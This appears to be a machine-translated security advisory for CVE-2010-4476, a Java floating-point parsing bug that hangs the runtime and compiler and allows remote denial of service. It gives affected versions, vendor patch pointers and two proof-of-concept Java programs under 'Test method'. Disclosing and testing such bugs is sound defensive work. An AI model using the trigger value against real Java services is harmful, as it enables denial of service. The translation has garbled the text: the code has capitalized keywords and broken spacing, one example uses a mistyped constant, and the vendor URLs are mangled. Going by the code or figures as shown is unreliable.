Release date:
Updated on:
Affected Systems:
Apache Group Tomcat 5.0-7.0.6
IBM Websphere Application Server 6.1.0.27-6.1. 33
Sun SDK 1.3.1-1.4.2 _ 24
IBM Runtimes for Java technological 5.0
Unaffected system:
Apache Group Tomcat 7.0.8
Apache Group Tomcat 6.0.32
IBM Runtimes for Java Technology 5.0 SR12 FP 4
Description:
--------------------------------------------------------------------------------
Bugtraq id: 46091
Cve id: CVE-2010-4476
The Java Runtime Environment (JRE) provides a reliable runtime environment for JAVA applications.
Oracle Java has a vulnerability in processing malformed numeric values. Remote attackers can exploit this vulnerability to suspend applications written in Java and cause DOS.
When the decimal number 2.225074255072012e-308 is a double-precision binary floating point value, the Java runtime and editor enter an infinite loop. This number should be converted to 0x1p-1022 that is DBL_MIN, but java falls into a loop between 0x1p-1022 and 0x0. fffffffffffffp-1022.
<* Source: Konstantin Preisser
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Konstantin Preisser () provides the following test methods:
Send a Java Program Into An Infinite Loop
Compile this program and run it; the program will hang (at least it does on a 32-bit system with the latest JRE/JDK ):
Class runhang {
Public static void main (String [] args ){
System. out. println ("Test :");
Double d = Double. parseDouble ("2.225074255072012e-308 ");
System. out. println ("Value:" + d );
}
}
Send the Java Compiler Into An Infinite Loop
Try to compile this program; the compiler will hang:
Class compilehang {
Public static void main (String [] args ){
Double d = 2.2250738585072012e-308;
System. out. println ("Value:" + d );
}
}
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
IBM
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://www.ers.ibm.com/
Sun
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://sunsolve.sun.com/security